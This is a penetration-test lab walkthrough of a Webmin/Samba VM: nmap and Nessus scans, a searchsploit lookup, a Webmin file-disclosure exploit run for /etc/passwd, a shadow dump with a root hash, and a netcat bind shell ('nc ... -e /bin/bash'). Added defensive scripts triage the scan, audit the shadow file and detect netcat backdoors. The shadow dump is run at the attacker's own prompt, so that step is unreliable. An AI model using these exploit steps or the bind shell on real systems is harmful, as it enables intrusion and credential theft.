A. Information Gathering and Service Enumeration
1. Scan with nmap
root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
|   NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UBUNTUVM<00>         Flags: <unique><active>
|     UBUNTUVM<03>         Flags: <unique><active>
|     UBUNTUVM<20>         Flags: <unique><active>
|     MSHOME<1e>           Flags: <group><active>
|_    MSHOME<00>           Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.112

NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
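A scan like the one above is only useful once somebody turns the port table into a list of things to fix. The following script is an added example, not part of the original post or of nmap: it parses nmap's normal output into records, pulls the ssh-hostkey fingerprints out of the script output, and flags the items a defender would follow up from this particular result (SMB reachable from the scanner, the Webmin administration interface exposed, and any host key fingerprint that is not in the inventory, which is what the Nessus finding below ends up demanding anyway: host keys must be regenerated, so their fingerprints must change). The sample text and the KNOWN_HOSTKEYS inventory are constructed for the example; in practice you feed it `nmap -oN` output and your own build records.

```python
import re

# Constructed sample: the port table from the nmap -A run above, retyped here
# as a string so the script runs offline (pass real `nmap -oN` output instead).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
"""

# "PORT STATE SERVICE VERSION" rows, e.g. "22/tcp open ssh OpenSSH 4.6p1 ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# ssh-hostkey script rows: "| ssh-hostkey: 1024 aa:bb:...:ff (DSA)" or "|_2048 ... (RSA)"
HOSTKEY_RE = re.compile(r"^\|_?\s*(?:ssh-hostkey:\s*)?(\d+)\s+([0-9a-f:]{47})\s+\((\w+)\)")

# Constructed inventory of the fingerprints this host is *expected* to present.
# In practice it comes from build records / ssh_known_hosts, never from the scan itself.
KNOWN_HOSTKEYS = {
    "192.168.0.112": {"10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d"},
}


def parse_nmap(text):
    """Turn nmap normal output into a list of port records.

    Script output ('|' lines) belongs to the port row that precedes it; only
    the ssh-hostkey fingerprints are extracted from it here.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip(),
                          "hostkeys": []})
            continue
        hk = HOSTKEY_RE.match(line)
        if hk and ports:
            bits, fingerprint, algo = hk.groups()
            ports[-1]["hostkeys"].append((algo, int(bits), fingerprint))
    return ports


def triage(ports, host, known_hostkeys=KNOWN_HOSTKEYS):
    """Return (port, note) pairs worth a follow-up, based only on what nmap reported."""
    findings = []
    expected = known_hostkeys.get(host, set())
    for p in ports:
        if p["state"] != "open":
            continue
        for algo, bits, fp in p["hostkeys"]:
            if fp not in expected:
                findings.append((p["port"], f"{algo} host key {fp} is not in the inventory: "
                                            "verify it or regenerate the host keys"))
        if p["service"] == "netbios-ssn":
            findings.append((p["port"], "SMB reachable from the scanner: confirm guest access "
                                        "and message signing settings"))
        if "Webmin" in p["version"]:
            findings.append((p["port"], "Webmin administration interface exposed: restrict "
                                        "by firewall and keep the version current"))
    return findings


if __name__ == "__main__":
    records = parse_nmap(SAMPLE_NMAP)
    for r in records:
        print(f"{r['port']}/{r['proto']:<3} {r['service']:<12} {r['version']}")
    for port, note in triage(records, "192.168.0.112"):
        print(f"[{port}] {note}")
```

Script output is attached to the preceding port row because that is how nmap lays it out; if you extend the parser to other NSE scripts (smb-security-mode, for instance) the same rule applies.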
2. Scan with Nessus

NESSUS REPORT

List of Plugin IDs
The following plugin IDs have problems associated with them. Select the ID to review more detail.

PLUGIN ID# | # | PLUGIN NAME                                                     | SEVERITY
32314      | 1 | Debian OpenSSH/OpenSSL Package Random Number Generator Weakness | High Severity problem(s) found

PORT SSH (22/TCP)
Plugin ID: 32314
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness

Synopsis
The remote SSH host keys are weak.

List of Hosts
192.168.0.112

Description
The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.
The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.
An attacker can easily obtain the private part of the remote key and use this to decipher the remote session or set up a man-in-the-middle attack.

Solution
Consider all cryptographic material generated on the remote host to be guessable. In particular, all SSH, SSL and OpenVPN key material should be re-generated.

See also

Risk Factor
Critical / CVSS Base Score: 10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score: 8.3 (CVSS2#E:F/RL:OF/RC:C)
Bugtraq ID
Plugin publication date: 2008/05/14
Plugin last modification date: 2011/03/21
Ease of exploitability: Exploits are available
Exploitable with: Core Impact

192.168.0.112

Scan Time
Start time: Mon Jan 30 19:31:52 2012
End time:   Mon Jan 30 19:36:04 2012

Number of vulnerabilities
High:   1
Medium: 5
Low:    38

Remote Host Information
Operating System: Linux Kernel 2.6
NetBIOS name:     UBUNTUVM
IP address:       192.168.0.112
MAC addresses:    08:00:27:aa:ec:6d
root@BT:~# nmap -v -sN 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:29 WIT
Initiating ARP Ping Scan at 19:29
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:29, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:29
Completed Parallel DNS resolution of 1 host. at 19:29, 13.00s elapsed
Initiating NULL Scan at 19:29
Scanning 192.168.0.112 [1000 ports]
Completed NULL Scan at 19:30, 2.37s elapsed (1000 total ports)
Nmap scan report for 192.168.0.112
Host is up (0.0022s latency).
Not shown: 995 closed ports
PORT      STATE         SERVICE
22/tcp    open|filtered ssh
80/tcp    open|filtered http
139/tcp   open|filtered netbios-ssn
445/tcp   open|filtered microsoft-ds
10000/tcp open|filtered snet-sensor-mgmt
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
           Raw packets sent: 1017 (40.668KB) | Rcvd: 996 (39.828KB)
1. First, change into the exploit-db directory:
root@BT:~# cd /pentest/exploits/exploitdb/
2. Type ls to list the directory contents:
root@BT:/pentest/exploits/exploitdb# ls
files.csv  platforms  searchsploit
3. Next, run ./searchsploit webmin to find the entries for Webmin:
root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
4. Copy the Perl file 2017.pl to the home directory by typing cp platforms/multiple/remote/2017.pl ~
root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~
5. Leave the pentest directory by typing cd
root@BT:/pentest/exploits/exploitdb# cd
6. List the home folder to check the copy
root@BT:~# ls
2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
download                         NessusReport27.rtf  NessusReport65.rtf  workspace
galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
galau.txt                        NessusReport35.rtf  NessusReport67.rtf
IS2C                             NessusReport40.rtf  NessusReport70.rtf
Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf
7. Run 2017.pl to see its usage
root@BT:~# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
        0 -> HTTP
        1 -> HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@BT:~# perl 2017.pl 192.168.0.112 10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
        0 -> HTTP
        1 -> HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
8. Retrieve the user and password account file /etc/passwd from the target, with type: perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME: /etc/passwd
 FILE CONTENT STARTED
-----------------------------------
-------------------------------------
9. Show all the usernames and password hashes in the shadow file, type: cat /etc/shadow
root@BT:~# cat /etc/shadow
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::
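From a defender's side the interesting part of a shadow dump is what it tells you about the password policy: which accounts can actually log in with a password, what hash algorithm protects them, when they were last changed and whether they ever expire. The script below is an added example written for this post, not something from the original or from any tool it uses: it parses lines in `/etc/shadow` format, names the hash family from the `$id$` prefix, converts the "days since 1970-01-01" field (15362 in the dump above) into a calendar date, and reports the accounts an administrator should act on. The sample lines are constructed; the root hash in it is a made-up value, not the one from the dump.

```python
from datetime import date, timedelta

# Constructed sample in the shape of the /etc/shadow dump above. The root hash is
# a made-up sha512crypt-looking value; the last two lines add a weak-hash account
# and a passwordless account so the audit has something to say about them.
SAMPLE_SHADOW = """\
root:$6$examplesalt$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
oldbox:$1$abcdefgh$ijklmnopqrstuvwxyz012:15362:0:90:7:::
guest::15362:0:99999:7:::
"""

EPOCH = date(1970, 1, 1)   # shadow(5) counts days from here

HASH_FAMILIES = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt",
}

# Hash families that are either absent or no longer considered adequate.
WEAK = {"empty", "descrypt", "md5crypt"}


def classify(pw):
    """Name the hash family of a shadow password field, or say why it is not one."""
    if pw == "":
        return "empty"          # no password is required at all
    if pw[0] in "!*":
        return "locked"         # '!' or '*' prefix: password login disabled
    for prefix, name in HASH_FAMILIES.items():
        if pw.startswith(prefix):
            return name
    if len(pw) == 13 and "$" not in pw:
        return "descrypt"       # traditional 13-character DES crypt
    return "invalid"            # e.g. the 'x' placeholder seen above: matches no password


def parse_shadow(text):
    """Parse shadow(5) lines into dicts; raises on a line without the nine fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        user, pw, lastchg, _min_days, max_days, *_rest = fields
        entries.append({
            "user": user,
            "hash_type": classify(pw),
            "last_change": EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
            "max_days": int(max_days) if max_days else None,
        })
    return entries


def audit(entries):
    """Return (user, issue) pairs for accounts that can log in with a password."""
    issues = []
    for e in entries:
        kind = e["hash_type"]
        if kind in ("locked", "invalid"):
            continue            # nothing to crack and nothing to expire
        if kind in WEAK:
            issues.append((e["user"], f"weak or missing hash ({kind})"))
        if e["max_days"] is None or e["max_days"] >= 99999:
            issues.append((e["user"], "password never expires"))
    return issues


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e['user']:<8} {e['hash_type']:<12} changed {e['last_change']}")
    for user, issue in audit(parse_shadow(SAMPLE_SHADOW)):
        print(f"ACTION {user}: {issue}")
```

Applied to the dump above, every service account carries the `x` placeholder (which no password can ever match, so those accounts are effectively locked) and only root has a real hash, which was set on 2012-01-23 and never expires.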
Backdooring
1. nc -l -p 1234
2. nc localhost 1234 -e /bin/bash
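The two netcat commands above are the classic shape of a bind shell: one process listens on a port, another hands a shell to whoever connects. Seen from the host, both leave a very recognisable process command line, which is what a defender hunts for. The script below is an added example, not part of the original post: it runs over constructed `ps -eo user,pid,ppid,args` style lines and flags netcat invocations that listen or that execute a program on connect (`-e` as used above, plus `-c`/`--exec`/`--sh-exec`, which exist in netcat-traditional and ncat). The sample process list is constructed for the example; in practice the same check is run over EDR or auditd `execve` records.

```python
import os
import shlex

# Constructed sample of `ps -eo user,pid,ppid,args` output. The two nc lines mirror
# the backdooring steps above; the last nc line is an ordinary port check and must
# not be flagged.
SAMPLE_PS = """\
USER       PID  PPID ARGS
root         1     0 /sbin/init
www-data  2041  1987 /usr/sbin/apache2 -k start
root      3120  3001 nc -l -p 1234
root      3121  3001 nc localhost 1234 -e /bin/bash
user      3302  3200 nc -zv 192.168.0.112 22
"""

NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
# "run this program for each connection" options of netcat-traditional and ncat
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}


def inspect_command(args):
    """Return the reasons a command line looks like a netcat backdoor ([] if none)."""
    argv = shlex.split(args)
    if not argv or os.path.basename(argv[0]) not in NETCAT_NAMES:
        return []
    reasons = []
    for i, tok in enumerate(argv[1:], start=1):
        if tok in EXEC_FLAGS and i + 1 < len(argv):
            reasons.append(f"executes {argv[i + 1]} for each connection")
        elif tok.startswith(("--exec=", "--sh-exec=")):
            reasons.append(f"executes {tok.split('=', 1)[1]} for each connection")
        elif tok.startswith("-") and not tok.startswith("--") and "l" in tok[1:]:
            # short-option cluster containing -l, e.g. "-l", "-lp", "-lvp"
            reasons.append("listens for inbound connections")
    return reasons


def scan_process_list(text):
    """Apply inspect_command to every row of a ps listing (header row skipped)."""
    findings = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)         # USER PID PPID ARGS
        if len(parts) < 4:
            continue
        user, pid, _ppid, args = parts
        reasons = inspect_command(args)
        if reasons:
            findings.append({"pid": int(pid), "user": user, "args": args,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_process_list(SAMPLE_PS):
        print(f"pid {f['pid']} ({f['user']}): {f['args']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

A listener alone is only suspicious in context (netcat is also used for file transfers), so the two reasons are reported separately; a netcat process whose command line executes a shell is worth an alert on its own, and pairing it with the listening socket on an unexpected port (1234 above) and an egress or ingress firewall rule that should have blocked it closes the loop.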